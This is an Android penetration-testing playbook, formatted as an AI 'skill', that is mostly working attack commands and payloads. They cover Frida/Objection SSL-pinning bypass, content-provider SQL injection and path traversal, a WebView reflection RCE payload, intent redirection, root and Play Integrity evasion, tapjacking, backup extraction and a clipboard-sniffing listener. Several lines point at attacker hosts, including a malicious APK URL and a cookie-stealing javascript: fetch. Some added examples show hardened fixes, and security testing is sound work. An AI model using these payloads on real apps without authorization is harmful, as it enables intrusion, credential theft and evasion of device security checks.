android-pentesting-tricks

Published Jun 17, 2026

SKILL: Android Pentesting Tricks — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.

Before going deep, consider loading:

  • Advanced Reference
  • FRIDA_SCRIPTS.md, when you need:
    • Ready-to-use Frida script templates for common Android testing tasks
    • Detailed hook points for OkHttp, Retrofit, Volley, WebView
    • Root detection bypass script collection

1. SSL PINNING BYPASS

1.1 Frida Universal Bypass

# Install Frida server on device (needs root; the server version must match frida-tools on the host)
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "su -c '/data/local/tmp/frida-server-16.x.x-android-arm64 &'"

# Universal SSL pinning bypass: spawn the app so the hooks are in place before its first TLS handshake
frida -U -f com.target.app -l ssl_pinning_bypass.js
# (Frida < 16 also needed --no-pause; since Frida 16 the spawned process resumes on its own)
| Hook point | Library / class | Coverage |
|---|---|---|
| X509TrustManager.checkServerTrusted | Android SDK | All standard HTTPS |
| OkHttpClient.Builder.sslSocketFactory | OkHttp 3.x/4.x | Square OkHttp |
| CertificatePinner.check | OkHttp 3.x/4.x | OkHttp pinning |
| HttpsURLConnection.setSSLSocketFactory | Android SDK | Legacy HTTPS |
| SSLContext.init | Android SDK | Custom SSL contexts |
| WebViewClient.onReceivedSslError | WebView | WebView SSL errors |
| TrustManagerFactory.getTrustManagers | Android SDK | Factory-created TrustManagers |

1.2 Objection (Quick Method)

objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable

1.3 Network Security Config (Debug Builds)

If you can modify the APK, or it is a debug build. Note that debug-overrides is only honoured while the app is debuggable; for a repackaged release build put the user trust anchor under base-config instead (and list src="system" next to it there, because trust-anchors in base-config replaces the default set rather than adding to it). Either way the manifest's <application> must reference the file with android:networkSecurityConfig="@xml/network_security_config".

<!-- res/xml/network_security_config.xml -->
<network-security-config>
  <debug-overrides>  <!-- applied only when android:debuggable="true" -->
    <trust-anchors>
      <certificates src="user" />  <!-- Trust user-installed CAs (added to the existing anchors) -->
    </trust-anchors>
  </debug-overrides>
</network-security-config>

1.4 Magisk Module Approach

| Module | Method | Scope |
|---|---|---|
| LSPosed + TrustMeAlready | Hooks the TrustManager/SSL classes system-wide | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Mounts user-installed CAs into the system store (/system/etc/security/cacerts) | All apps that trust system CAs; Android 7 through 13 |
| ConscryptTrustUserCerts | Patches the CA store inside the Conscrypt APEX, where it moved in Android 14 | Android 14+ |

2. COMPONENT EXPOSURE

2.1 Exported Activities

# Find exported components. aapt prints booleans as hex, so grep for the value rather than "true"
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 'exported.*0xffffffff'
# A component with an <intent-filter> but no android:exported attribute is exported by default
# when targetSdkVersion < 31 (Android 12 made the attribute mandatory in that case)

# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
  -d "target://callback?token=attacker_token"

# With extra data
adb shell am start -n com.target.app/.TransferActivity \
  --es "amount" "99999" --es "recipient" "attacker"
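Grepping aapt output for exported components misses the implicit cases (intent-filter without android:exported, providers on old targetSdk), so here is a small parser of `aapt dump xmltree` output that applies the default-export rules and prints the `am start` / `content query` one-liners from this section. This is an added example, not part of the original playbook or any tool it names; the manifest dump is a constructed sample and com.target.app is a placeholder package.

```python
"""Exported-component finder over `aapt dump xmltree target.apk AndroidManifest.xml`
output, applying Android's default-export rules instead of grepping for "true".
Added example (not the playbook's code); the dump is a constructed sample."""
import re

SAMPLE_DUMP = """\
N: android=http://schemas.android.com/apk/res/android
  E: manifest (line=2)
    A: package="com.target.app" (Raw: "com.target.app")
    E: uses-sdk (line=7)
      A: android:minSdkVersion(0x0101020c)=(type 0x10)0x15
      A: android:targetSdkVersion(0x01010270)=(type 0x10)0x1e
    E: application (line=11)
      E: activity (line=20)
        A: android:name(0x01010003)=".AdminActivity" (Raw: ".AdminActivity")
        A: android:exported(0x01010010)=(type 0x12)0xffffffff
      E: activity (line=25)
        A: android:name(0x01010003)=".DeepLinkActivity" (Raw: ".DeepLinkActivity")
        E: intent-filter (line=27)
          E: action (line=28)
            A: android:name(0x01010003)="android.intent.action.VIEW" (Raw: "android.intent.action.VIEW")
          E: data (line=30)
            A: android:scheme(0x01010027)="target" (Raw: "target")
      E: activity (line=33)
        A: android:name(0x01010003)=".InternalAdminActivity" (Raw: ".InternalAdminActivity")
        A: android:exported(0x01010010)=(type 0x12)0x0
      E: service (line=37)
        A: android:name(0x01010003)=".BackgroundService" (Raw: ".BackgroundService")
        A: android:exported(0x01010010)=(type 0x12)0xffffffff
      E: provider (line=40)
        A: android:name(0x01010003)=".UserProvider" (Raw: ".UserProvider")
        A: android:authorities(0x01010018)="com.target.app.provider" (Raw: "com.target.app.provider")
"""

COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")
NODE_RE = re.compile(r"^(\s*)E: ([\w-]+)")
ATTR_RE = re.compile(r'^(\s*)A: (?:android:)?(\w+)(?:\(0x[0-9a-f]+\))?='
                     r'(?:"([^"]*)"|\(type 0x[0-9a-f]+\)(0x[0-9a-f]+))')


def parse_dump(text):
    """(package, targetSdkVersion, components); a component records its tag,
    name, authorities, explicit android:exported (or None) and intent-filters."""
    package, target_sdk, comps = None, None, []
    cur, cur_indent = None, -1
    for line in text.splitlines():
        node = NODE_RE.match(line)
        if node:
            indent, tag = len(node.group(1)), node.group(2)
            if cur is not None and indent <= cur_indent:
                cur = None                                   # left the component's subtree
            if tag in COMPONENT_TAGS:
                cur = {"tag": tag, "name": None, "authorities": None,
                       "exported": None, "has_filter": False}
                cur_indent = indent
                comps.append(cur)
            elif tag == "intent-filter" and cur is not None:
                cur["has_filter"] = True
            continue
        attr = ATTR_RE.match(line)
        if not attr:
            continue
        indent, name, sval, hval = len(attr.group(1)), attr.group(2), attr.group(3), attr.group(4)
        if name == "package":
            package = sval
        elif name == "targetSdkVersion":
            target_sdk = int(hval, 16)
        elif cur is not None and indent == cur_indent + 2:  # the component's own attributes only
            if name == "name":
                cur["name"] = sval
            elif name == "authorities":
                cur["authorities"] = sval
            elif name == "exported":
                cur["exported"] = hval != "0x0"              # aapt prints true as 0xffffffff
    return package, target_sdk, comps


def is_exported(comp, target_sdk):
    """Explicit android:exported wins. Without it, providers are exported below
    targetSdk 17; other components are exported iff they declare an intent-filter
    (targetSdk 31+ refuses that combination at install time)."""
    if comp["exported"] is not None:
        return comp["exported"]
    if comp["tag"] == "provider":
        return target_sdk is not None and target_sdk < 17
    return comp["has_filter"]


def exported_components(text):
    package, target_sdk, comps = parse_dump(text)
    return [(c["tag"], c["name"]) for c in comps if is_exported(c, target_sdk)]


def attack_commands(text):
    """The adb one-liners from this section, one per exported component."""
    package, target_sdk, comps = parse_dump(text)
    verbs = {"activity": "am start -n", "activity-alias": "am start -n",
             "service": "am startservice -n", "receiver": "am broadcast -n"}
    cmds = []
    for c in comps:
        if not is_exported(c, target_sdk):
            continue
        if c["tag"] == "provider":
            cmds.append("adb shell content query --uri content://%s/" % c["authorities"])
        else:
            cmds.append("adb shell %s %s/%s" % (verbs[c["tag"]], package, c["name"]))
    return cmds
```

Feed it the real dump with `attack_commands(open("manifest.txt").read())`. Component names are printed exactly as the manifest declares them (relative `.Name` or fully qualified), which is what `am start -n package/name` expects.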

2.2 Content Providers

# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users

# SQL injection in content provider (the selection is pasted into the WHERE clause;
# the UNION's column count must match the projection, three columns here)
adb shell content query --uri "content://com.target.app.provider/users" \
  --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

# Path traversal in a file-backed content provider (openFile() trusts the URI path);
# if the literal form is rejected, retry with the dots URL-encoded (%2e%2e%2f)
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
| Provider type | Attack vector | Impact |
|---|---|---|
| Database-backed | SQL injection via query() projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |
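To see why the two payloads above work, and what the fixed provider looks like, here is the same logic reproduced against SQLite: a query() built the way SQLiteQueryBuilder builds it (projection pasted into the SELECT, selection wrapped in parentheses, which is why the payload starts by closing one) next to a hardened version, and a file-backed openFile() with and without a confinement check. This is an added example, not the page's code; the users table, its rows and BASE_DIR are constructed for the demonstration.

```python
"""Provider SQL injection and path traversal, reproduced offline.
Added example; schema, rows and BASE_DIR are constructed."""
import os
import re
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed users table standing in for the provider's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?)",
                   [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return db


def raw_query(db, projection, selection, args=()):
    # Shape of the SQL SQLiteQueryBuilder produces: projection and selection
    # become SQL text, only selectionArgs are bound as parameters.
    sql = "SELECT %s FROM users WHERE (%s)" % (", ".join(projection), selection)
    return db.execute(sql, args).fetchall()


def vulnerable_query(db, projection, selection, args=()):
    """query() that forwards the caller's projection and selection untouched."""
    return raw_query(db, projection, selection, args)


PUBLIC_COLUMNS = {"id", "name"}           # `pass` must never be client-readable
# selection grammar the hardened provider accepts: `col = ?` terms joined by AND
SAFE_SELECTION = re.compile(r"^\s*\w+\s*=\s*\?\s*(?:AND\s+\w+\s*=\s*\?\s*)*$", re.I)


def hardened_query(db, projection, selection, args=()):
    """Whitelist the projection, constrain the selection to a grammar, bind values."""
    if set(projection) - PUBLIC_COLUMNS:
        raise ValueError("projection requests a hidden column")
    if not SAFE_SELECTION.match(selection):
        raise ValueError("selection must be of the form col = ? [AND col = ?]")
    if set(re.findall(r"(\w+)\s*=", selection)) - PUBLIC_COLUMNS:
        raise ValueError("selection filters on a hidden column")
    return raw_query(db, projection, selection, args)


BASE_DIR = "/data/data/com.target.app/files"        # constructed provider root


def resolve(uri_path):
    """What a naive openFile() does: decode, join under BASE_DIR, normalise."""
    return os.path.normpath(os.path.join(BASE_DIR, unquote(uri_path).lstrip("/")))


def hardened_open_file(uri_path):
    """Same resolution, then confine the result to BASE_DIR. commonpath rather
    than startswith, so "../files_backup/x" is rejected as well."""
    full = resolve(uri_path)
    if os.path.commonpath([full, BASE_DIR]) != BASE_DIR:
        raise PermissionError("path escapes the provider root: " + full)
    return full


def rejected(fn, *args):
    """True when fn raises the provider's validation error for these arguments."""
    try:
        fn(*args)
    except (ValueError, PermissionError):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    payload = "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"
    print(vulnerable_query(db, ["id", "name", "pass"], payload))   # schema leaks through the UNION
    print(rejected(hardened_query, db, ["id", "name"], payload))   # True
    print(resolve("../../../../etc/hosts"))                         # /etc/hosts
    print(rejected(hardened_open_file, "../../../../etc/hosts"))    # True
```

On Android the equivalent of hardened_query is a projection map plus SQLiteQueryBuilder.setStrict(true), and the equivalent of hardened_open_file is resolving the File's canonical path and checking it stays under the provider's root before opening it.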

2.3 Broadcast Receivers

# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
  --es "url" "http://attacker.com/malicious.apk"

# Ordered broadcast interception (higher priority receiver intercepts first)
# Register receiver with higher priority than target to intercept/modify data

2.4 Exported Services

# Start an exported service with attacker-chosen extras
# (`am start-service` on current Android; the older `startservice` spelling is still accepted)
adb shell am startservice -n com.target.app/.BackgroundService \
  --es "command" "exfiltrate"

# List running services
adb shell dumpsys activity services | grep com.target

3. WEBVIEW VULNERABILITIES

3.1 JavaScript Interface RCE (targetSdkVersion < 17)

// Vulnerable setup: every public method of the bridge object, including getClass(), is
// reachable from page JavaScript when the app targets API < 17 (or runs on a device
// below 4.2). From API 17 only methods annotated @JavascriptInterface are exposed.
webView.addJavascriptInterface(new JSInterface(), "android");

// Reflection-based RCE from attacker-controlled page content (the CVE-2012-6636 pattern).
// Inject into the WebView:
// android.getClass().forName('java.lang.Runtime')
//   .getMethod('getRuntime', null).invoke(null, null)
//   .exec(['/system/bin/sh', '-c', 'id']);

3.2 Modern WebView Attacks

| Vulnerability | Condition | Exploit |
|---|---|---|
| setJavaScriptEnabled(true) + untrusted content | JS enabled and attacker controls the loaded URL or HTML | XSS → bridge access |
| setAllowFileAccessFromFileURLs(true) | file:// pages can read other file:// URLs | Load file:///data/data/com.target/... |
| setAllowUniversalAccessFromFileURLs(true) | file:// pages can reach any origin | Exfiltrate via XHR to an attacker host |
| loadUrl(user_controlled) | User input reaches loadUrl | javascript: scheme or file:// |
| shouldOverrideUrlLoading bypass | Incomplete URL validation | Redirect to attacker-controlled page |
| evaluateJavascript with tainted data | User data concatenated into the JS string | XSS in WebView context |

3.3 Deep Link → WebView Chain

1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with the attacker URL
3. XSS in the WebView calls the JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in the app's process with the app's permissions
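The "incomplete URL validation" and loadUrl(user_controlled) rows are where the chain above is usually decided, so here are the two checks most often found in shouldOverrideUrlLoading() or in front of loadUrl(), the inputs that slip past each, and a parser-based check that holds. This is an added example, not code from the page; trusted.example stands in for the app's own host and attacker.example for a hostile one, and the payload list is constructed.

```python
"""URL allow-list checks for a WebView, weak forms beside a correct one.
Added example; hosts and payloads are constructed placeholders."""
from urllib.parse import urlsplit

TRUSTED_HOST = "trusted.example"


def prefix_check(url):
    """url.startsWith("https://trusted.example"), a very common pattern."""
    return url.startswith("https://" + TRUSTED_HOST)


def contains_check(url):
    """url.contains("trusted.example"), worse still."""
    return TRUSTED_HOST in url


def strict_check(url):
    """Parse first, then compare scheme and the whole host label-wise."""
    parts = urlsplit(url)
    if parts.scheme != "https":          # rejects javascript:, file:, intent:, http:
        return False
    host = parts.hostname                # lower-cased; userinfo and port already split off
    if not host:
        return False
    return host == TRUSTED_HOST or host.endswith("." + TRUSTED_HOST)


# Constructed inputs: (url, what it exercises)
PAYLOADS = [
    ("https://trusted.example/account", "legitimate"),
    ("https://TRUSTED.EXAMPLE/account", "legitimate, different case"),
    ("https://trusted.example.attacker.example/xss.html", "trusted host as prefix of the attacker host"),
    ("https://trusted.example@attacker.example/xss.html", "trusted host in the userinfo part"),
    ("https://attacker.example/?next=https://trusted.example", "trusted host in the query string"),
    ("javascript:fetch('https://attacker.example/?c='+document.cookie)//trusted.example",
     "javascript: scheme, host only in a comment"),
    ("file:///data/data/com.target.app/shared_prefs/trusted.example.xml", "file: scheme"),
]


def bypasses(check):
    """URLs the check accepts although they are not on the trusted origin."""
    return [u for u, _ in PAYLOADS if check(u) and not strict_check(u)]


def false_negatives(check):
    """Legitimate URLs the check wrongly rejects."""
    return [u for u, _ in PAYLOADS if strict_check(u) and not check(u)]


if __name__ == "__main__":
    for name, check in (("prefix", prefix_check), ("contains", contains_check), ("strict", strict_check)):
        print(name, "bypassed by:", bypasses(check), "rejects:", false_negatives(check))
```

Python's urlsplit and the Chromium parser inside WebView disagree on some edge cases (backslashes, embedded whitespace, unusual ports), so treat the list as the starting set of forms to send through the real deep link and confirm in the app which URL the WebView actually loads; in the app itself, do the comparison on the parsed android.net.Uri (scheme and host) rather than on the string.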

4. INTENT REDIRECTION

Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.

// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any non-exported activity, using the
// exported activity's identity (and any URI permission grants carried by the outer Intent)

# Exploit: `am start` has no flag for a Parcelable Intent extra, so a true Intent-in-Intent
# needs a small PoC app that builds the inner Intent and calls putExtra("next_intent", inner).
# The string form below only works where the app parses a string extra with Intent.parseUri():
adb shell am start -n com.target.app/.ExportedActivity \
  --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"

| Pattern | Indicator | Risk |
|---|---|---|
| getParcelableExtra → startActivity | Intent-in-Intent | Start non-exported activities |
| getStringExtra("url") → Intent.parseUri / startActivity(Intent.ACTION_VIEW) | URL forwarding | Open arbitrary URLs or components |
| getStringExtra("class") → Class.forName → startActivity | Dynamic class loading | Start any activity by name |

5. ROOT DETECTION BYPASS

5.1 Common Root Detection Checks

| Check | What it detects | Frida bypass |
|---|---|---|
| su binary exists | /system/xbin/su, /system/bin/su, /sbin/su | Hook File.exists() → return false |
| Build tags contain "test-keys" | Build.TAGS | Overwrite the static field Build.TAGS with "release-keys" |
| Magisk app installed | Package name check | Hook PackageManager.getPackageInfo → throw NameNotFoundException |
| Superuser.apk present | Su management app | Hook File.exists() |
| RootBeer library | Multi-check root detection | Hook every RootBeer check method → return false |
| SafetyNet / Play Integrity | Server-side attestation | Not hookable client-side; Magisk DenyList + modules (§6) |
| Abnormal system properties | ro.debuggable=1, ro.secure=0, etc. | Hook SystemProperties.get |

5.2 Magisk DenyList (Previously MagiskHide)

# Enable DenyList in Magisk Manager
# Add target app to DenyList — Magisk hides itself from that app
# Covers: su binary, Magisk Manager package, mount points, props

6. PLAY INTEGRITY / SAFETYNET BYPASS

| Level (verdict) | What it checks | Bypass difficulty |
|---|---|---|
| Basic Integrity (MEETS_BASIC_INTEGRITY) | Not rooted, not an emulator | Easy (Magisk + Zygisk + DenyList) |
| Device Integrity (MEETS_DEVICE_INTEGRITY) | Google-certified device, verified boot state | Medium: Play Integrity Fix spoofs a build fingerprint that still passes; without it, a locked bootloader is required |
| Strong Integrity (MEETS_STRONG_INTEGRITY) | Hardware-backed key attestation (TEE / StrongBox) | Very hard; the attestation chain is rooted in hardware |

Techniques:

  • Magisk with Zygisk enabled + DenyList for target app
  • Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
  • Shamiko module: hides root from specific apps
  • Custom ROM with locked bootloader (Pixel-specific tricks)

7. TAPJACKING (OVERLAY ATTACKS)

<!-- Tapjacking activity: transparent and hidden from recents, so it can sit on top of the victim.
     The overlay itself is a window added through WindowManager with TYPE_APPLICATION_OVERLAY
     and FLAG_NOT_TOUCHABLE, so touches fall through to the victim underneath; that requires
     SYSTEM_ALERT_WINDOW ("draw over other apps") in the manifest. -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>

| Android version | Protection | Bypass |
|---|---|---|
| Pre-6.0 | SYSTEM_ALERT_WINDOW granted at install time; touch filtering is per-view opt-in (filterTouchesWhenObscured, API 9+) | Full overlay over any app that does not opt in |
| 6.0 to 11 | Overlay permission must be granted by the user in Settings; filtering still opt-in | Social-engineer the grant; apps without filterTouchesWhenObscured remain vulnerable |
| 12+ | Untrusted touch blocking: touches passing through another app's overlay are dropped unless that overlay's opacity is 0.8 or lower | Partial overlays that leave the target region uncovered, low-opacity overlays, timing-based |

8. BACKUP EXTRACTION

# Check if backup is allowed (aapt prints booleans as hex)
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true; an absent attribute also means true (the default)
# Apps with targetSdkVersion 31+ are excluded from `adb backup` on Android 12+; use run-as (§9.1) on debuggable builds instead

# Extract backup (the device prompts for confirmation; leave the password empty)
adb backup -f backup.ab -apk com.target.app
# Convert to tar: skip the 24-byte header ("ANDROID BACKUP", version, compressed=1, "none")
# and inflate the zlib stream (openssl must be built with zlib support).
# An encrypted backup says "AES-256" on the fourth line and needs the password first.
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar

# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data
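The `dd bs=24 skip=1` step only works because an unencrypted archive has exactly a 24-byte header; reading the header instead makes the conversion recognise an encrypted or uncompressed archive rather than feed it to zlib, and the same code can run the shared_prefs sweep from above. This is an added example, not the page's or any tool's code; the archive in sample_backup() is constructed in memory (a one-entry tar, zlib-compressed, behind a version-5 header) so the conversion runs offline.

```python
"""adb backup (.ab) to tar by parsing the header. Added example; the sample
archive is constructed and the token value inside it is a placeholder."""
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP\n"


def parse_header(blob):
    """Return (version, compressed, encryption, payload_offset). The header is
    newline-separated: magic, version, compressed flag (0/1), encryption
    ('none', or 'AES-256' followed by further salt/IV/key lines)."""
    if not blob.startswith(MAGIC):
        raise ValueError("not an adb backup archive")
    pos = len(MAGIC)
    fields = []
    for _ in range(3):
        end = blob.index(b"\n", pos)
        fields.append(blob[pos:end].decode("ascii"))
        pos = end + 1
    return int(fields[0]), fields[1] == "1", fields[2], pos


def ab_to_tar(blob):
    """Tar bytes of an unencrypted archive; refuses encrypted ones explicitly."""
    version, compressed, enc, off = parse_header(blob)
    if enc != "none":
        raise ValueError("encrypted backup (%s, v%d): needs the backup password" % (enc, version))
    payload = blob[off:]
    return zlib.decompress(payload) if compressed else payload


def list_entries(blob):
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(blob))) as tf:
        return [m.name for m in tf.getmembers()]


def find_secrets(blob, markers=(b"token", b"password", b"secret")):
    """Entries whose content mentions a marker: the shared_prefs/databases sweep."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(blob))) as tf:
        for m in tf.getmembers():
            if not m.isfile():
                continue
            data = tf.extractfile(m).read()
            if any(k in data.lower() for k in markers):
                hits.append(m.name)
    return hits


def sample_backup(encrypted=False):
    """Constructed: the shape adb backup produces for one shared_prefs file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        xml = b'<map><string name="auth_token">constructed-token-value</string></map>'
        info = tarfile.TarInfo("apps/com.target.app/sp/session.xml")
        info.size = len(xml)
        tf.addfile(info, io.BytesIO(xml))
    header = MAGIC + b"5\n1\n" + (b"AES-256\n" if encrypted else b"none\n")
    return header + zlib.compress(buf.getvalue())


if __name__ == "__main__":
    blob = sample_backup()
    print(parse_header(blob))          # (5, True, 'none', 24)
    print(find_secrets(blob))          # ['apps/com.target.app/sp/session.xml']
```

For a real file: `open("backup.tar", "wb").write(ab_to_tar(open("backup.ab", "rb").read()))`. Entries sit under apps/<package>/ with sp/ for shared_prefs and db/ for databases, so the marker sweep covers the two directories the text above tells you to check.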

9. ADDITIONAL TRICKS

9.1 Debuggable App Exploitation

# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's user — full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml

9.2 Drozer (Component Testing Framework)

# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2

# Query provider
dz> run app.provider.query content://com.target.app.provider/users
# Scan for injection
dz> run scanner.provider.injection -a com.target.app

9.3 Clipboard Sniffing

// Pre-Android 10: any app can read the clipboard at any time. From Android 10 only the
// foreground app or the default IME gets clipboard contents, so a background listener like this goes blind.
import android.content.ClipData;
import android.content.ClipboardManager;

ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();   // null when the clip is empty or access is denied
    if (data != null && data.getItemCount() > 0) {
        CharSequence text = data.getItemAt(0).coerceToText(this);
        // Exfiltrate copied passwords, tokens, etc.
    }
});

10. ANDROID PENTESTING DECISION TREE

Testing Android application

├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis

├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)

├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)

├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)

├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks

├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials

└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)